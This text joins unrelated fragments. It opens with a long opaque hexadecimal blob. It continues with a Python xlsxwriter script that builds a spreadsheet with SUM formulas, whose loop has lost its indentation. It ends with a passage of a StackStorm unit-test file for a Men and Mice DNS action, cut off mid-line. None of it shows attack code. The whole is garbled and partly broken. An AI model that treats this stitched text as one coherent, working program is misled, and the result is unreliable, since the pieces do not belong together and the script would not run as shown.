105B23D53C4499CEB6329264E8FD2CE0EE6C661F00C44D0410BF378200717F5035C70AE9C0FD250BBD2C957AE6FCC90B2AF44A74959A2E58B63A67A8ABD9425EE5C2087597AF81475432235B49DD8FA3813AC08205231753866619EA2DCDB4BD7291BB1068EC6665051A869C06F0FA2834B1F6064E9FD4781E9B4B9808779C381058FD02CA9F2D2359C89BF6AAA70DE1EA79336FD909D452124B35121BB59EF53CD3DC4089450CB74019720D71FCCF171B9D9C1C9F9A1A9E1A9F1A99181FDF1B1B8F8D4F1E1F9E1F191BD6B439439F9F9B18D792B1496D7274CAD047B4586C62746EA44FD84CA13D449FA52F276E72B3DFE9589F30AC421AB7CF6B1FD5E7DA4321BF88ADA6CDACD557DEBAAACF3217A647E7C7C7C7E7A7A6601E23F3497D52D386936363F3E307E7C76331637E22FE50F1CA75DFE4495CB6863E4854BFBC4DBF81363EDE2F2AE4457D653E3E2A1133BE0550B6AAB499F354AD828DC7BD76EBD62DDFA7E40207B49149A4AD05DFEA29B50E3AA7ADC2EE7235C844F3C172191BA76E529A5846F13413BCF81091AF5C3EA1AD6A990592227A46B894CDE7571F52513F82AB597E4FD5E67B731EBEBBA1AB87FA4B94D5F955358B5A5095AF45BE0DBD1578070EA4E9EFDE28CB538580825BFBE453680054C7B38E69135AF3102F4477F2462E05AF9D241AFD4D92797285195CA549C6394F8F90C894DEDFAA288A89DF516EDF83A2275132267EC74B696914765C465AFA9B444B9763C4C224F9D8AA74908646FE8F2A2DCA4EA555E1A63751F88BDA9B3662D6DCEB57AA4E038CBE7EADDA2AEAE05583D248CF29E42EF8821CEBEF23CA3DE60BBE589D7E496B600E6FA035B2D537E32C905EA759684D484108DA7DE538B35B845A76E6FA38B11264CA039C83DD8EFC0192FB2CC44D8F96B8310F606920BBD68403D82FB0D995CD68713373BD4D98282D6DE29A8D6FB1598EF1F9A31E22954CABC0F882D5E8F663FC8EFB8BF103EC8C1110036450018B17D96E1429361E2C8199A5F53786EFCD7EB9F1398CA2CD0E396E8EE179709AA0FBDCEB0368BE837BEE0A4ED1844C3D655A1C2A1320E5F68B300D8262549E0718CC2D136D72F304A04B4DB9D32767E781C7E72CBE054FC8CD2D79658BAA6A3900713A375D042C40308E3C0B39488BB3B20AE302FCFC1102249C31AB2927866D222B4214C66E861405A91D21CF76C6F9386C7E2FDAFDFD0E1A2BD87CC78584AC88BBBAF0DDACD5B0958FE36ECDFFB6D8B3788BF6EB6DB216241A3ECC7A6CE4B180DBE49E1A4B0D62FFA0DF0171ECDCDA0DF9E666DC923659B7A1B0E7FBD9C50C899B805745EAFCEB24BAAA253F9010F20368E6D78AE30018E0C344895550F0461BDFB1EDE4B4D1C06723AA09FF008004935A33CBBC8584068E52397F85CC345AE438DCA522789C5A679C4E1AA7B5D2383DCCEE22064661FE3BDC8363896C02ED1E7C0FCF08CF11BC92AF84CA3A9CB276A7ACD329EB9465D43FEF75338748FB10221D66E8678110E9EF1C35B54DCEF3C073919BFE36A8B10D5D3E967650BD2ED2ED760B153101AA1E025404955EA7689985C0E3989127C91DC16B849464DBA6AEA9DC2DD825A32605591B73C8DA49206B3993114449C6DF2C87386E70F2902C604AFA1B85FEDEEFF447527EC7A9CCA1A33F594C471F47B9A3E3CFE7E5D65C19E644FAB0538A0E22EAF461A9AB336F1ABE861369E2AB2418161547395B555C732BF39BB8BB7EEDEA5CC15A758D43BD988FE4ACE7B36AD2A9DCBFD381E7EF96409D83D95CCAE4F6D9855CFC3D58CA6DC53500E719E16D6DE7CD5C1CD770FC194CDEEED0A2FF8C0979EA1CBCA0F8352C22F9ED19D9CF9CF8E0F17F254B9286877C5F407B7D8F8FDE934C3AEA15E11BA2811D833D52C8F1710BCB1A755B10FC4BFC22567A83BC9FCE09D7F139D3D2B8CECE0810FCBE172F204F960DAC163100AAE03A946EC861BE866CC97B010B00CE00B2CFCD23B9FA84B28970441B600DC74BB24662090C1F709A1B86030DB6D289D079E67AA34015A74EDF6807FAA8135108952A08F7A01400D169400B4898853D900D0051C415E1E320E703E916BEF4476131AC0035C03919717B60E0B0CA1DEF3F8CC9479C374F1FF04798B4BEC2A7882798E00692A5AFED26FC1CC0D786341952A951D244E27F45D9C45F05F322CC0FB16AE85FC0989CFE8D54A47FB9D55FADA47383F58ED1AAF48EC23C905E690B7B85E94B825A81DF08A140809291839BF97C36AD9EE4462D81A6BF315FCD53F96C2147B29D0025A2B7475809F41401FABAC78DF49C06545CA9CA8EF664105D782E60B3BA7A3B6C462ABB04A969822351C46FC1CF415C46BB69EFACA7B3A365D5E25D56A17095DABA9190ABADFB18AE3C58707239E102E3445317ED31EE36AB3816AB825041FE8753670A7A5070BDC9CAEF2BE86DD180A6603D44B135B1A566928B36729FCF1BEF8435FD0905876FA2E15F502A0D2FCD5F81DA5B3D2CAD5D5BB86F43AB433405CC2582B41
19AA5B50B2BB67D8E03C7A38E6D1E76DFC9876D75F70D1FA48B0FB2C91DA4560E522B0709B395AFD1C3C907AE930F5CE73EF0AA329BF9347D8A6E7AE0C15085075E3D4E1FB087BAAF472F72BB0D05FCFA66020B64EA3673BD97BC6BF94851C16BD2585F5166676F5C0DD50061874F7A8088B1DEA027855A5785A6740B4D6B26249C375053BA956B4AB77935A5DB91EC0426D46EF281607D07576DED64DCD118DDDF1BC8FDBD81BBBF37A2428564E040740275B9D4CB09604E46EEE113FF97A159F725F06842B781FBDE46FA0A7815F0A0CD4865AE35D1F821F244E68FB5CFFB58AE15E02BA0CF2D6BA93CC48278DB7346664123930053572F036D9979C50CF7484285EA656B207068E0C009EE0591667B2B0FBC80ED868E9840EB222CF17B2F1261589D7C555DC8C3F8C5A373E97911B2E053DD0853BEAE787F1CEEC33B4C93CBCEBC69A4746B1AC9A0874CBD2F65A64D7B7A4AFEF13F21E9EB372ADCE028B0A2A461033A7F6EBEA515D904BAD3B88C3E466A897BCD5D188F56082B8122D1E6AA5900D1A743742711B523CE43CA1285A8D61F8609FD00645EFD95B0438A10B31B02901A7234EDE4EA8692B08800A9084FC3AC9724003512E44778D35AA11BAF73347C618CECE06AF8EAA586EF8388AAA84D8368031048588603E0CA0C8475EEE7270CC13FE7F0E2C1F5FF8134C36D30AF76AEE62E99575D55F39A50BCF3AA2B19E7F9907F5E86E29D97A80F951708FE66E6695A1DE275D5074CABBEAA697DD637ADFA9269FDA3E29FD63FF8A6555AFF738A9C17BEAE68C0BCA255CDCB0879E7152D1967BE685EF0FA5A2BD59F5084B58288471145448FB28C10A9934B66D958D52C1BC3DE5936968CFA29E69FE5C361A0052AD47F37520088FF4AE6D354D57C7ED8379FA692FE878BE6F35FC3DEB7565A1FE5F0754C98E5138ADD4C28763DA88CF1E7868AF0D91AA2B2DBEC75611009833C8219016029AA8783BCA55808497C15F9558E50CB8B7E7A8B3A1C454C22BB2391332A9AB982F02DF829DE8A09AA0AE3DF8789E6C3D7AEB8C8D34BFC6DC8B8907CC355C911FF536438EC0A49503E127F07362397797C2A2DBFC0430F5A469EF46E9CC3966273AE7E8BE7BD65312737EAE4C6B89A535E8E3BB989D220462408D1CCCCB3C8632135C5945AE0B150E926D5636AA80DFE7BAF7686CADF533D2A337E5DEBB97A201456CC1DF27D361423F6C9F425035850CDB47605D13F820775F512D813D786FE38F331A1A47E28D290067D0E222251FEC42DBA91DBE4DEA414D84108BAACF80799E46451A7E01188940B2185BA06FE4DD35AAEDF89559033B4654FF8021259522D53C493D2AC5B246FCB1B74D324811CD7DAC244E24822C5C9A0FD2731B9C18258667C15E7F1733E4D9FD3B554E4CCB2B425DF1C96254DE283B70BDD6463686B510DD4C46E833AFC7E4B98DB36D6299BE04A06BD6A07C62A1A8A1E69A2800A4225823BC2D1707EE45E7BD01D0E95D57002F0EF02B0BDFA778ACFF0312A54994875F1F8083CD216915C4B0D322A156F4F522161C2D48C020C5B2A5E4885D042DC5FB3E379EAEDAF86ADBC4901126AE6BAA500965A3D4AEA95161152806B62B8EA146DB7C83EAB47B07058E6D59CA2D79C42710A7AB01672E38213275D050F5DF50C8568408C5A47D8EF0B381D1E1F0B07ABA79854EDA48EE915FDB409754CBD547790B39CFBE85EEBAD083D2A675A3337D0FE0AB9FB1D1C739E44661E795F3E1637B40B1E2B5A662CB21D2B3B202C901B4C41869E072DC6659227B61E5DEFC4CAD8CD9968A65C85FFB3B399DDCE8A7A91AAEE61C45443FD6D7E1D323229AFAC0E99D19F2F1D11CEFACF05F2CF575930132BAA488F39AF2B952C3B9D9300B29CE1D8A3819DCF020247BDAC6C6DACD8FD788D93DE5FCA59799DABCAF3BDE5A6B033700AC4C789CE547A7BC55AF18D1ABD91B288A36CC40455B06F68B1239FF175FA8BAF7A721129D5C4F9144E01A6675E494C900559E9B228D72238F8DAA45824C1745EBB9C78D2ABE7DB98E558B1B59647A546019BB89AB1C8E6CB2FE6C05578880544B38A79039F2C6BE9826A9398236DA4CD94B96CAAB7C486ECDFEEA766AA3509FB293F7142F4CF3BFC644A8343AB94F56D43051D29795CA59AB02A8179DFE2442ED1526410823B46047382ADCC75825A46E771EE72B738C9FAA3B292AEE5346E9802DFC82AA55D56E0E7F790764911ED1224EE6F266AA489484AB4ADEA1534481868962EF8450F39A9908B508D285963B925BCB485E266F4529F416E3EEF62552A0EF440379FF3FEE818A2F4A03F3A868899B1DB1F1D439436F98621DC845FE53C0564936BCB75FB7C1C179499A10811402717345B7516947A44D67A6A75C8BE5E22912470E9F1E9C425CB056617514323C1633F34DE1F7FA7245D9FA49487D2BB4CEA46BE0C7F91097DAE1C9E5BE250658424B716574BBF3C36EA0C8BBD553E664324C063F1FDEC35E7B1E8F54E6C7EA5098AF24AC39D2C506978
D2AB2EDC16502726EBA002F05E3BEC21F42107ACF53DF656E1673F2E0AB52C38882AE53DF5BEAFDA2DFC44E0167E3430C0CD81C000375D32F69A5E5FEC4A1765AFA02B5D65113A7E3ABF087DC6B48D746159CBF090C7B43F3F83AFA5497E05A162218E970A8A762CBECD85D2F0C7D4CB347E9BCD6537AC707F43BCEC30813FFDEA865159E096755111F3588651A188779E302A1E2D2D7069C2B42E84C23FD4BD867C314F567E4111715266AEFF07054DDD4238A7C9DB64BE87466FDCD615858BADAC17A308D792D81C65D37CE0761E7AAEC3F5B7F3EA32F9041AD8EA610C0F4C925AC7CDA78BEE35A11210ADE28899E571956F3793135033F17F366A3231AC733713666D78DDCD12DC9E6E33F18608B31405FA802260DE1EC13BBDAEB1E2ED1639682F0DDA8A710DD75A69DC16CFB86DF0E976321E6D8504B95B598FBD45AA4E6FFD0123560B58C6369ADA1B43C80A6FC5AAC041125FE882D69DC2930B3842EE9F062C1EF5B91BFADC26FB74EADFB043818312CBF807B09CB6D3727A277280707D15FECFBA9C20CE6307E7B4770A25AB62ABEE46EEDB382077A3196C0890F300E2F7290E0A99C69D034603A3923B34BF47C94AE2D58D3B13F1882088F01F1D3C6039E085C224273CBDF1D7E1DC1B4A6633F3E6022F3E3268E593D3F3B9A4BDD23708E4796ADAD4FB06535A660132036766FA06F56CC698965D99BADB4F9CFC2A3E8A73405FF5DD699899B660588327E2F10BF1C499F34F1C3D7B660698A913F1F347CF9DD87D1826E9E735DFEBBCF180B8D1233E7ED5B549F4C60CBC4E562BEB8F2C2C1C0FB26A186C522C97B245BEA9FB82C3041A2796AB1EF0A4581DBF9EEA3CE23AB2DB7156CAEAC35D339DD332255D7B175E9552DF5D1B2539D609E641F2DF9F63C22106960ED02506770D32B47C72919B23A2823E8E1157E2280889238717C758D771B40788A3712035B909CF921531726BC435172E9F711030923514B482F351C41DE13E594AF3D0BD1225E3B8CB665A5BA69E302A38DF9AB42BAF331954D7CC2C5B6E3C5C0A271E91BB2DFE4659BE0C2C261F25CB7F7341D68EBF063F1711ABE708AB07535CB5F0978B915BE1AA5D38E670579D30B1639B94268A9DDBA634502DEC05C38FD4015DD02E9832A813DA86C263E11A2344C6F8E91CD2DEBED7D4C28DAA83AEADEE2411B12245BADC57458A88BD9E2A9F774F49887A1CEB25758224480D921228F36D72621986C85CBE5598CBBB28B00D6DD9B9217B0B13916E4F7B67E2CC6165276A7267AEF7284863D491313C9D932024DA114E96902FC0529B50924AEBFE4DC2BC0AE5BF327AAE3896214A82E42861EB6132890F09732C74C0C1EB1E96D84C995E241CE4D90F612C0262E111BCB3C54348343031E8161AB4910889461AB7C1332E1EA0D749EF722B05F605FC3ECCE5B4DB90DE21AD7108E5DD741B4DF88978D82E2B9F0A791BC2BF5937482F36E382DF926F44B85EDD38AEBF5BA66D5F00B81486362532D897EBC9C3098B0D8A5403E9031F943FE242795BB30B9EB0B58E7990A13BE8A3C7832155F554DE3032C1D8D323CBFD8E2223EADD57A3564B02386DF08089DE60047BD2CC98D6A2CFC1D7835F013D948A4BBDDFED658915571D3CFA794C7E9349D9A2833DE3BF81C96731F91C261571A5EB0B40F2111E45974E74431144FC97B0EC7725728CFF1626BF83C9A730F93D4C10B1C57F1F933FC0E40F599000E1D7E1E75DE18AF2C4A870EB6A73B49F1CBDB5128A5228665607A1B872682D2AD05A53A8CD8FCA7C522AD4D8BEC6A4544171B5F4F622F1D52BEE53591E1222831520BE3A6560E848BF146B30A06A8C5715554A9A04D9C98FFA7B3F15BF723130B2D598BF6BA292C93E30204A564945FF34F607B49AE0AD2E6210437FEDA0C85F93DE31F65941CDEE47D02D0C9DB4BE080F8D103E1B76E2265517742B4898F797AC4A61DE7F0914E6BD1428CC7B5FA030EF6D81D1AA539E785BCF1745E1E2F1B6FE5D51142E1E6FEBD34551B81AA9F4F7BC51B89AB8E8B0B9587448FE26F7300A1789EE273760979B0988C5F545B9204C3D21399716BA44A792A2A20437484EA0653409086CEC9EF49CBEDA880E3318B733B198A3A68B39EF7D8F7C929449055884254B0F27F6A7B8F41EA2C5543E0C74A0D4B29679A4961DF79A0FF909E5EA6A58A9CC8A00A18F368CEE011FDCF5574139A1B0616991B62DE41CC67D4CB8FD89DD2AE3A7BB82CBA74854D98C82CB0BC48D90784FC4642691658D08168405E85C42EDBD4E247A872786B32B87FB229B057ADCEEC42EA14D37DCEB12A438F6C9BD2A70B69BA43CF2190AF0F363CECBFB01453ACD965483FD59838C478F3CFCEE934E14E8D2BA4F40DDCD54EB2F1471445EAF606F14E055829AEC61181DCDB52D69765D468A6C45B6DC3FDC78B7C2BDA32C88BB40625175590C6EFB81A457B0ED07A7F837C636B8024421DE42EEA4D923C49214B25AE419B19D39943009AF643D970B423AA1A1B9F8A
9268BBC0226D27B2D3AF12A889086279F312DBF48CAE9BF2A3154B1BE94CC03D45B8BF08D937943B3316A0C11B31DFE7A97EC6C2E67E8C5360447332A45BB51B3C964219F870AEB38ED6E9C982F2B0073E2C9F0F8FCBA04B244DA13A0277B0212603D2D61F6E3C6EA5C56CBEB6732364CBC90E307499DB870921F6C85C41109C4F2463A7BD3F09CA841FEA3B59262F09843D24132B030F100363A39EB69FAD10240FB1FC34F3D407EEB5A315511E2A76570BAA253D802349098AA9D6879F81B6AE531599C682CFC0C8D06A2F2BD258408A25E4490B8D788E05B80089E590711B832A9C3528324823334FA2236720D52486A90C8781D7142B3C7FFAF9566F8D734C31621B212068C6D2E5FE11BC47318408D1CA4460E1221B55ABBB0BF4724544B112043E409D82E5DEE5C24942004D205F865934044F5CCEE2061503D85FC2744544741637881086687E01B4BF8D3007C16B77D88E88DCAACBE85BCF43A2422DA8A53424454871A302902DAE67DE6D94CC1F9784D2179144049B5CC05A8D5C300BF08447490EAEE08AC8B58A501910F2016AC7B8DEAA22CCADEEAC72AEAFDC52AA5D84146EB77D89812087917A1E5BC21D2CB6B37908B7100BE1F2F14C9BE302CEC9C21A2E959D538CC21E7251DE144B3417284EB1F1F1E1EDE5FE4E6773C18717294B151D4B941555EFCB7995703573502FD6EC19DEBA0C66D1B468D6315F1E388447C1C493633C9DC5442947F8AC9D73029427D5189FA84E5BF4D022C4275D99C071DD67BD061FC7F60F15FB0200EFB4FE0E7E11AC77DA398C396B830D8CA5F62C74D5561C7609CF883F71A273E18BABAFA96D71C4E9451C8B869089A803896FCED32E8B13B433E258FED3E73ECF6F9946AE594EA18326675AC223E8CDC253EBC1A880F298E31F6E9E2C3563F3E7419B37AC25BDB025FCBDB8AF0E1980F77FAEB3EE1BCE88590CB98F123B7CBBC7581421DC6ECFB5D745BC498EDBC7F283438AE2900D240E7EF97E77A3E5D150E15AEE7D97BE87B1E841C27EF13725C97F8C0575CCEF1BD4C2081BBC6B00135368061832217080C6BF9D4390E7ABDB788F32E1544D522CE08E13BF832EB20CC3FAB84353DA1497F9609F91F10230BE42BC915513F83C9CF0722CB2FE1DEAE29AB102A8F2C25A2E4A577C94AD67BD1E653F71A6DFE2DB09267AB459B2ECEAC802B85D9412599E24725369DB9FE3EF730618C4F13E181C0BDEC6310F25B3D27E590752464F4C82179019A40D098744C2F728E88E136C9DB5E74377BE38B4C067EB150FC07D7574938D98D468EAE70B247F89AE1409B1C1CB859DA3814E3C02F288E44B0B85A090E5442F2E0B9D2BA4F38B31BF3E040FEA9E87CE1D226C538F009171D17E1C0EDF70F07BE2242C6BB0E0773B7C2C9F51009C70CE50C1BEF5AA8E9BAF0F918B3FE8A68C36D749788A30AA4FE1D27D0AC8C7C08E520D8F7E19B113FD2797A7DCCE39EF28B9323CDAF1B199BDB2720AEE1F1655B02B10E2E989710EBE8EB601D6E53C7C5953BC99ACEC1346429B7216CD3E8C5361FBDD7D8E62830699F794D3369BE01DBDD012372C0881CB05672749504971F25D16697C074F59EFEEB8977F33D54A03DFF39C9D835140B3A1B4A18BB062F63D750C2D8CD026727DFC95F12A6BBAA5CADC8EDD555E0F65CE9E71B2A707BC5D2CFDB15B8BD62E9E7875CD66DEBABC6BA7D57493F5F191C8D9606AF301AE604FD8670EAAB8F4EBFE3059846FAAE05988D1221C6BF8E0999DFFD2F4CFE0F636CA3A8F1CBF0F3D5BB63C8B6DE35B20C66C8B47B8D22FF1118B278B52852B062B74302B1B811DF833CD35CB62C528E2DAB71D9B25A0F5B565BCA967942763A63B86C598DCB9645882DAB2961CB6ABC6C594D005B76C7617C560959DD01B6EC4E05B62C52155BF6DF36C096D555C5961DBA5BB6EC8DAFB365F79D2D5BDE080A2961CBC88A72A378C46DF49A65CBB6B3CA6C99FAAAF1658BB957882F431160269BB6788077578316A2723272CC100E2A453F77E067173C9C35BF0EFA69A058EFAFF366AFF366AFF366F7037755E2CD3C16FEAFF366F78137DB1062AD02A7EEAF88533305D4DCBD1CA45A14C3E99CB66C108A14A7F6BD7699326EE4FECA3265DF74702231657FC3AA60CABE023F4F465E2DA6EC75B7A98D814A746F08709B3A06DDC50D8D16AF258F9DBC98B56C52B807384FF91B70AB00AA7F20A0FE28AF7F3C9B4E1B19DBD77D9087D398BFBAA7F320B7ACF141D8B496A5CE1829C336CAF73A31A81E053897932801A67FA36040E5C028479383EA95CCFC7DF290C28F3E97B5D777904297DCE723AF3B48BD261DA4E27F84C9CBF38FFA7B26FCA360E5171279DC60C27FAE90139772B12C6771773837DD4B9D36420EF6013FE990163D3FDC4AACE8385A6BBA1E51D05B40783D9CCA4B91BBF588F2C1E597BE33E0B21724B7DF3F90BC2318248B1A67CD6523B04ACCAD92BD6910251500774595D9ECADC04EC69C1AA7B5452DB09371A7CA254D0F8C1A
37E1D4389A59C8AFDE97A070B417D60798FF0F7E7E131771FF06006629B8FC876AC1E56F7BC0E5715CB25AC8018F3FED018F0984889E7BEFF780C3372104F4DC7BB307FCBD8010CF736F8EB92741FD2472969E7B27E95E0BDDFB3CF2719E7B1C78B6D1BDAF7A03D3B573E0D9510C3C3B5F19E049F0E6EC99C74F1014E557179E3841E0944C9C672FCC1258A55BA78F9E3E4AF0956E5D3A3AC31D5171B11C3D7F2AFEE45D015B37B65D5811E3D8668E9F5048AB8AB0AC0B1DB565CB2C5D58D8F6CF7061D129B021173AD656913A50D2770AECC7EEF5A1CEC7956AE3D7B871CF436CF5ABCC0D79A7D0E1293D6B218E602B86C06BC5C5E717B5644918D3CA7A31A4DDCCF58438541665FE28ABE13A0331E9068AFAD2480E38740C6B273F7A558C8987A9A2DC66135331D079374599C1696DE6554F9DBEF1753CF9B0571EBB45E2A367F8B15B51114E46B17B84A4649FE3FAF91185479109A8E6C836B6DD3FECF0100B946DCCA8E58267F7FB47170DCEA2EF4A69E5F52420B8ED1D3718C3D0850F0C9D4C52EC04B33191013FD619BAF418D6E29B19CA4BAEE288BD9A33024D9B5B992335784AF468E26BE3720792E1AA0416F0682651D1050BE875E21128C877C103A6A84296508D24A6C7FFA6E19BB850A677A358AD1A413877914480C4F9FDC7306980C7E5D155DC68CE08C1486640279C7A1D480C11062C2D0E6BCD2E92A708E7F7DF1988431B618016189A1F6A5A362E0A32F87B28FA4994CE7A685676297BE9FCCEA293EC5F270D5F270DEF1569D82491F8C2FAB4E1B7E02756FB3A6DF85AA10DE3358AE4AE238A64B16B15C967D72992D9AE5724C71D55EE92E37689C04E45C050095D61EDB81460BC49095A3AD8E8B1DA974BFDD57B01E197EE35F577FBAEA8BF52D2AF02C9A79373B708F0E1D28DADAE2B78683D8D5D98E8C68E52BA911F3BC7D57409D4EC71E20F43243B2E001EBAB19B4749EE11746393876EDC4CD6FFBD9C6EDC8287B512DDB8CDA11BF72940376E2F4337EE2847377283929D2CA0DAABE1AD1D7C16A673D0E9CB231B5F0B8E696AE539DC1C1D1CBE97F46BBC1901874BBBAE474907D2B69509D9788B2220DB3F313AB681493A96423B554BCB3A461CF136ACD78E0911AFE8DB15EF502A93B15D703F87307BA602BA47488E5AA9E66A89591F0CFFE57B0DC3E72AC2702266CB1E591615867E18DD9502C102B446069DC2D3AE7E594488F202EBB01F58D7A0DE71890E0F5F22A3001E05AA04582F134BEF00EBA78A8075BB70CF7A8647515DEAA4311158770B04D1E307D6210EAC1B28E6ED160EACB712A06E4340BD8DCC003761C73E40BDDD6FF9B78F8C1CF0857F4AF106DEF0557B358C17C65910E0BD62399AFC7D8F1CDE278B6184BC9A316ED151831B160D0437107A362B20F2F7869002EEB347647CF2574FB0500C9851B93A9414CF78440457DD905881C3E1A622387C7FE0EFE6BB83BFEF581F0853C070541A79E0EFFA50978406CB690E7CF14C490E72D18B96E42EF3A5801719A417D603BC1102BD4D6404500C78770501DE062FE0FDF6BD06BC2FDE33C0BB552905BC1500AECE63EE7510892D5A7A024584F9218F1E9F59DE43ADEC81A86571B2870F64D7A100B517E02D07D914DC1BE06E2F5ABC71901DF582EC2D8C4E87DE2A40769B07646F2390BDDD01D93B38C8DE4920FB3104D96A1990BDAB1CC8FE7B02D9BB5940350764EFB97F207B9A0581C553858CB62CC3DCF8C1F6958C5D58568F6979D3C2B4501E7473EABC14B80693F30EE87E0521F7CBA2ED1F611BA0EDFFA990F66530CC77173A894A745244D207A114F7584022E47B02A8793F6A896F0E14C3FC23FCFC126296C7AAC42C9CB4AF0ABFE0BB708CAEBF51825F4E07E317402D4B1114F27922AFD221F41879B55E6004048F1180AC61818EA204E37E90D051AD8B8E5C794623C269BA682A23D426913521A02E12650322E8E6E14A85738FBC2726D8CC3C48864FB0464E30C256BE2E03B5CE5CFFB224DFF9715400E9D1449AF712781415EF2D2A7B6B60ABA34C1C45850CC1ED4626E22F74038668750F1AEEC1137F01AFA061F88D6FC26B69A3D7F26F853AAE6C0B3AB40991553D9B84A951D31A140801CEC20E7E5771AC993B1DB90C0F2A0B75AFC2FF592EB529BE5B85C4E6C1CA90216D1499D60645D47979A8687F205EA0F8DE12B64A28B1D72A63287DC9D6F2E41AC2C36FAA169DCB20011046D1195EEF398710021F291330871F24B11E14459DEA117E68EE343761F203712258C91D85827FCA53125A5911C60910A18439ACF50AA0C5C38FA74F7233DF0060ED025247EA32918ED32BD2D73BFAB51A385DF1E086FE4DE5207559305CF944A37748207D793567F0B0ABAE55F09884CFFD4D123493BE30A3A5E937954DF13384F042B30ADC30C22A581C4EE347E667D69BF92C39D670DDE2727C4B20DCFE36FCFC991F6E6FA270062D25D03B4A909A9F42DFA0D48A63835A94BD04B99B8541706BC881DB3E938
|
#!/usr/bin/env python
#coding:utf-8
import xlsxwriter
datos = [{'item1':1, 'item2':2, 'item3':3 }, {'item1':1, 'item2':3, 'item3':5 }]
# Set the initial row and column
row = 0
col = 0
# Create the workbook and add a worksheet
workbook = xlsxwriter.Workbook('tablaConFormulas.xlsx')
worksheet = workbook.add_worksheet()
# Create the cell formats
encabezado = workbook.add_format({'bold': True, 'bg_color':'blue'})
filaGris = workbook.add_format({'bg_color':'gray'})
filaBlanca = workbook.add_format({})
# Write the table header
worksheet.write(row, col, 'item1', encabezado)
worksheet.write(row, col + 1, 'item2', encabezado)
worksheet.write(row, col + 2, 'item3', encabezado)
worksheet.write(row, col + 3, 'suma', encabezado)
row += 1
# Fill the table with data
for elem in datos:
if row%2==0:
tipoFila = filaGris
else:
tipoFila = filaBlanca
worksheet.write(row, col, elem['item1'], tipoFila)
worksheet.write(row, col + 1, elem['item2'], tipoFila)
worksheet.write(row, col + 2, elem['item3'], tipoFila)
    rangoSuma = 'A' + str(row+1) + ':C' + str(row+1)  # Formula ranges are 1-indexed
worksheet.write_formula(row, col + 3, '=+SUM(' + rangoSuma + ')', tipoFila)
row += 1
workbook.close()
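# Hedged sketch (not part of the original script): the SUM range above can also
# be built with xlsxwriter's own cell-reference helper instead of manual string
# concatenation. The workbook/file names below are illustrative assumptions.
from xlsxwriter.utility import xl_rowcol_to_cell
demo = xlsxwriter.Workbook('tablaConFormulas_demo.xlsx')
hoja = demo.add_worksheet()
hoja.write_row(0, 0, [1, 2, 3])
rango = xl_rowcol_to_cell(0, 0) + ':' + xl_rowcol_to_cell(0, 2)  # "A1:C1"
hoja.write_formula(0, 3, '=SUM(' + rango + ')')
demo.close()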
|
from men_and_mice_base_action_test_case import MenAndMiceBaseActionTestCase
from run_operation import RunOperation
from run_operation import CONFIG_CONNECTION_KEYS
from st2common.runners.base_action import Action
import copy
import mock
import zeep
import logging
class TestActionRunOperation(MenAndMiceBaseActionTestCase):
__test__ = True
action_cls = RunOperation
def test_init(self):
action = self.get_action_instance({})
self.assertIsInstance(action, RunOperation)
self.assertIsInstance(action, Action)
def test_snake_to_camel(self):
action = self.get_action_instance({})
snake = "snake_case_string"
camel = "snakeCaseString"
result = action.snake_to_camel(snake)
self.assertEqual(result, camel)
def test_snake_to_camel_exclude_dhcp(self):
action = self.get_action_instance({})
snake = "exclude_dhcp"
camel = "excludeDHCP"
result = action.snake_to_camel(snake)
self.assertEqual(result, camel)
def test_resolve_connection_from_config(self):
action = self.get_action_instance(self.config_good)
connection_name = 'full'
connection_config = self.config_good['menandmice'][connection_name]
connection_expected = {'connection': connection_name}
connection_expected.update(connection_config)
kwargs_dict = {'connection': connection_name}
connection_result = action.resolve_connection(kwargs_dict)
self.assertEqual(connection_result, connection_expected)
def test_resolve_connection_from_config_missing(self):
action = self.get_action_instance(self.config_good)
connection_name = 'this_connection_doesnt_exist'
kwargs_dict = {'connection': connection_name}
with self.assertRaises(KeyError):
action.resolve_connection(kwargs_dict)
def test_resolve_connection_from_config_defaults(self):
action = self.get_action_instance(self.config_good)
connection_name = 'base'
connection_config = self.config_good['menandmice'][connection_name]
connection_expected = {'connection': connection_name}
connection_expected.update(connection_config)
for key, required, default in CONFIG_CONNECTION_KEYS:
if not required and default:
connection_expected[key] = default
kwargs_dict = {'connection': connection_name}
connection_result = action.resolve_connection(kwargs_dict)
self.assertEqual(connection_result, connection_expected)
self.assertEqual(connection_result['transport'], 'https')
def test_resolve_connection_from_kwargs(self):
action = self.get_action_instance(self.config_blank)
kwargs_dict = {'connection': None,
'server': 'kwargs_server',
'username': 'kwargs_username',
'password': 'kwargs_password',
'port': 123,
'transport': 'abc123',
'wsdl_endpoint': 'xxx?wsdl'}
connection_expected = copy.deepcopy(kwargs_dict)
connection_result = action.resolve_connection(kwargs_dict)
self.assertEqual(connection_result, connection_expected)
self.assertEqual(kwargs_dict, {})
def test_resolve_connection_from_kwargs_defaults(self):
action = self.get_action_instance(self.config_blank)
kwargs_dict = {'connection': None,
'server': 'kwargs_server',
'username': 'kwargs_username',
'password': 'kwargs_password'}
connection_expected = copy.deepcopy(kwargs_dict)
for key, required, default in CONFIG_CONNECTION_KEYS:
if not required and default:
connection_expected[key] = default
connection_result = action.resolve_connection(kwargs_dict)
self.assertEqual(connection_result, connection_expected)
self.assertEqual(connection_result['transport'], 'https')
self.assertEqual(kwargs_dict, {})
def test_resolve_connection_from_kwargs_extras(self):
action = self.get_action_instance(self.config_blank)
connection_expected = {'connection': None,
'server': 'kwargs_server',
'username': 'kwargs_username',
'password': 'kwargs_password',
'port': 123,
'transport': 'abc123',
'wsdl_endpoint': 'xxx?wsdl'}
kwargs_dict = copy.deepcopy(connection_expected)
kwargs_extras = {"extra_key1": "extra_value1",
"extra_key2": 234}
kwargs_dict.update(kwargs_extras)
connection_result = action.resolve_connection(kwargs_dict)
self.assertEqual(connection_result, connection_expected)
self.assertEqual(kwargs_dict, kwargs_extras)
def test_validate_connection(self):
action = self.get_action_instance(self.config_blank)
connection = {}
for key, required, default in CONFIG_CONNECTION_KEYS:
if required:
connection[key] = "value_for_key_{}".format(key)
result = action.validate_connection(connection)
self.assertTrue(result)
def test_validate_connection_missing_raises(self):
action = self.get_action_instance(self.config_blank)
connection = {}
with self.assertRaises(KeyError):
action.validate_connection(connection)
def test_validate_connection_none_raises(self):
action = self.get_action_instance(self.config_blank)
connection = {}
for key, required, default in CONFIG_CONNECTION_KEYS:
connection[key] = None
with self.assertRaises(KeyError):
action.validate_connection(connection)
def test_build_wsdl_url(self):
action = self.get_action_instance({})
connection = {'transport': 'https',
'server': 'menandmice.domain.tld',
'wsdl_endpoint': '_mmwebext/mmwebext.dll?wsdl'}
expected_url = ("{0}://{1}/{2}?server=localhost".
format(connection['transport'],
